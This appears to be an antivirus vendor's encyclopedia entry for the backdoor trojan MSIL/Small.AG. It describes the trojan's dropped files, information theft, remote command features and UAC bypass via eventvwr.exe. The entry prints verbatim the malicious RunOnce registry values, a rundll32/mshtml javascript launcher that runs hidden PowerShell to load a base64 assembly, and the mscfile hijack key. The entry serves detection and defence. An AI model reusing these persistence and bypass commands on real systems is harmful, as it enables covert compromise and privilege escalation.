MSIL/Small.AG [Threat Name] go to Threat

MSIL/Small.AG [Threat Variant Name]

Category trojan
Size 79872 B
Detection created Jan 21, 2014
Detection database version 9318
Aliases Exploit.Win32.BypassUAC.cnl (Kaspersky)
  Trojan:Win32/Skeeyah.A!bit (Microsoft)
Short description

The trojan serves as a backdoor. It can be controlled remotely.


When executed, the trojan creates the following files:

  • %mymusic%\­pequad.bak

In order to be executed on system start, the trojan sets the following Registry entry:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­RunOnce]
    • "EQuick2 Driver" = "rndll32.exe javascript:"\­..\­mshtml, RunHTMLApplication ";(eval("new ActiveXObject("WScript.Shell").Run("powershell.exe -Command iex((Get-ItemProperty -Path hkcu:LANMedia2).MPEG4Base)",0)"))(window.close())"
    • "MPEG4Base" = "[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String([System.IO.File]::ReadAllText("%mymsic%\­pequad.bak")))).EntryPoint.Invoke($null,$null)"

The following Registry entries are created:

  • [HKEY_CURRENT_USER\­Software\­Classes\­mscfile\­shell\­open\­command]
    • "(Default)" = %originalmalwarepath%
Information stealing

The trojan collects the following information:

  • user name
  • computer name
  • operating system version

The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.

The trojan contains a list of (2) URLs. The HTTP protocol is used.

It may perform the following actions:

  • download files from a remote computer and/or the Internet
  • run executable files
  • update itself to a newer version
  • uninstall itself

MSIL/Small.AG attempts to gain administrative privileges on the system.

Trojan is able to bypass User Account Control (UAC).

The trojan executes the following files:

  • C:\­Windows\­System32\­eventvwr.exe

The trojan may create the following files:

  • %mymusic%\­motanga.b2_
  • %mypictures%\­%variable%

A string with variable content is used instead of %variable% .

Please enable Javascript to ensure correct displaying of this content and refresh this page.